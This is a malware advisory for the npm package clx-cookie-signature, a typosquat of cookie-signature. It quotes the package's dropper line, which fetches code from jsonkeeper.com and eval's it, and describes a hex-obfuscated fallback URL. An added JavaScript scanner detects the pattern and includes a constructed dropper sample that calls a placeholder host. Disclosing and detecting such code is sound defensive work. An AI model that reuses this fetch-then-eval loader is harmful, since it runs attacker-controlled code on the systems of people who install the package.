
MAL-2026-6141

Malicious code in clx-cookie-signature (npm)

Details

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (9e0e91601d276764067b1b209efd17a1f59ef03ff4fc814bcb22c495f4a0f9b3)

The package impersonates the popular cookie-signature library, copying its README, its author field ('TJ Holowaychuk <tj@learnboost.com>') and its sign/unsign API, but index.js adds a top-level dropper that fires the moment the module is require()d. Specifically, index.js line 16 issues `require('axios').get('https://www.jsonkeeper.com/b/MYUKZ').then(r => { eval(r.data.content_o); })`, eval'ing whatever JSON the author currently hosts at that URL. A helper `g()` (index.js lines 18-24) decodes hex-encoded strings to reconstruct the tokens 'axios', 'get' and 'then' and a second payload URL, https://www.jsonkeeper.com/b/HY6M6, providing an obfuscated fallback dropper. Because jsonkeeper.com is a mutable, author-controlled paste host, the author can change the executed code at any time without republishing the package, so the payload seen during analysis need not be the one a victim receives. Any project that installs and require()s clx-cookie-signature (likely as a mistyped substitute for cookie-signature) runs arbitrary attacker-controlled code in the consuming process, with that process's privileges and environment.
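To make the description above concrete, here is an added example (not code from the advisory, from Amazon Inspector, or from the package itself): a small heuristic scanner that looks for the two signals the analysis describes, a `.then()` callback that `eval()`s the fetched response, and hex-encoded string literals that decode to `axios`, `get`, `then` or to a URL. It runs offline on constructed samples using the placeholder host paste.example. The two hex encodings it understands (`\xNN` escapes and bare runs of hex digits) and the suspicious-token list are assumptions, since the advisory says only that `g()` decodes hex-encoded strings.

```javascript
'use strict';
// Added example, not code from the advisory or from clx-cookie-signature:
// a heuristic static scanner for the fetch-then-eval dropper pattern.
// Node built-ins only; runs offline on the constructed samples below.

// Tokens that, when recovered from an encoded literal, point at a
// network-fetch-then-eval chain. Assumption: this list is ours.
const SUSPICIOUS_TOKENS = new Set(['axios', 'get', 'then', 'eval', 'Function', 'child_process', 'exec']);

// Decode a string-literal body that is either \xNN escapes or a run of hex
// digits (two assumed encodings; the advisory only says "hex-encoded").
// Returns the decoded text, or null if the body is not such an encoding.
function decodeHexLiteral(body) {
  if (/^(?:\\x[0-9a-fA-F]{2})+$/.test(body)) {
    return body.replace(/\\x([0-9a-fA-F]{2})/g, (_, h) => String.fromCharCode(parseInt(h, 16)));
  }
  if (body.length >= 6 && body.length % 2 === 0 && /^[0-9a-fA-F]+$/.test(body)) {
    const decoded = Buffer.from(body, 'hex').toString('latin1');
    // Hashes and ids are hex too; only keep decodes that are printable ASCII.
    return /^[\x20-\x7e]+$/.test(decoded) ? decoded : null;
  }
  return null;
}

// Extract the bodies of all single- and double-quoted string literals.
function stringLiterals(src) {
  const out = [];
  const re = /(['"])((?:\\.|(?!\1)[^\\\n])*)\1/g;
  let m;
  while ((m = re.exec(src)) !== null) out.push(m[2]);
  return out;
}

// Scan one file's source and return the findings plus a verdict.
function scanSource(src) {
  const f = { decodedTokens: [], urls: [], remoteEval: false, reasons: [] };

  // 1. Recover hex-encoded tokens and URLs (the g() trick).
  for (const lit of stringLiterals(src)) {
    const decoded = decodeHexLiteral(lit);
    if (decoded === null) continue;
    f.decodedTokens.push(decoded);
    if (SUSPICIOUS_TOKENS.has(decoded)) f.reasons.push(`hex-encoded token "${decoded}"`);
    if (/^https?:\/\//.test(decoded)) f.urls.push(decoded);
  }
  // 2. Plaintext URLs.
  for (const m of src.matchAll(/https?:\/\/[^\s'"`)]+/g)) f.urls.push(m[0]);
  // 3. eval() inside a promise callback: the response body executed as code.
  if (/\.then\s*\(\s*(?:\w+|\([^)]*\))\s*=>\s*\{?[^}]*\beval\s*\(/.test(src)) {
    f.remoteEval = true;
    f.reasons.push('eval() inside a .then() callback (fetch-then-eval)');
  }
  // 4. Method names computed at runtime, e.g. obj[g('676574')](...).
  if (/\[\s*\w+\s*\([^)]*\)\s*\]\s*\(/.test(src)) {
    f.reasons.push('member access whose name is computed by a function call');
  }
  f.urls = [...new Set(f.urls)];
  f.verdict = f.reasons.length >= 2 ? 'dropper-like' : 'clean';
  return f;
}

// Constructed imitation of the pattern described in the advisory (placeholder
// host paste.example; this is not the package's real source).
const DROPPER_SAMPLE = [
  "exports.sign = function (val, secret) { return val; };",
  "require('axios').get('https://paste.example/b/AAAA').then(r => { eval(r.data.content_o); });",
  "function g(h) { return Buffer.from(h, 'hex').toString(); }",
  "require(g('6178696f73'))[g('676574')](g('68747470733a2f2f70617374652e6578616d706c652f622f42424242'))[g('7468656e')](r => { eval(r.data.content_o); });",
].join('\n');

// Constructed benign sample resembling a genuine HMAC-based sign().
const CLEAN_SAMPLE = [
  "const crypto = require('crypto');",
  "exports.sign = function (val, secret) {",
  "  const mac = crypto.createHmac('sha256', secret).update(val).digest('base64');",
  "  return val + '.' + mac.replace(/=+$/, '');",
  "};",
].join('\n');

// Human-readable summary for one sample.
function report(name, src) {
  const f = scanSource(src);
  return `${name}: ${f.verdict}` +
    (f.reasons.length ? '\n  - ' + f.reasons.join('\n  - ') : '') +
    (f.urls.length ? '\n  urls: ' + f.urls.join(', ') : '');
}

console.log(report('dropper sample', DROPPER_SAMPLE));
console.log(report('clean sample', CLEAN_SAMPLE));
```

Two or more signals are treated as dropper-like; the constructed dropper sample trips all of them (three decoded tokens, the eval'd callback and the computed member access) while the benign sample trips none. This is a triage aid for packages pulled from the registry, not a substitute for reading the code, and it cannot speak to the payload itself: as the advisory notes, the executed code lives on a mutable paste host, so whatever the URL serves at scan time says nothing about what it serves later.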


Affected packages

npm / clx-cookie-signature

No fixed version published yet for clx-cookie-signature (npm). Because the package exists only as a malicious impersonation of cookie-signature, there is no known-safe version to pin to: remove it from dependencies and lockfiles, install the genuine cookie-signature package instead, and treat any host that ran `require('clx-cookie-signature')` as having executed attacker-controlled code.

References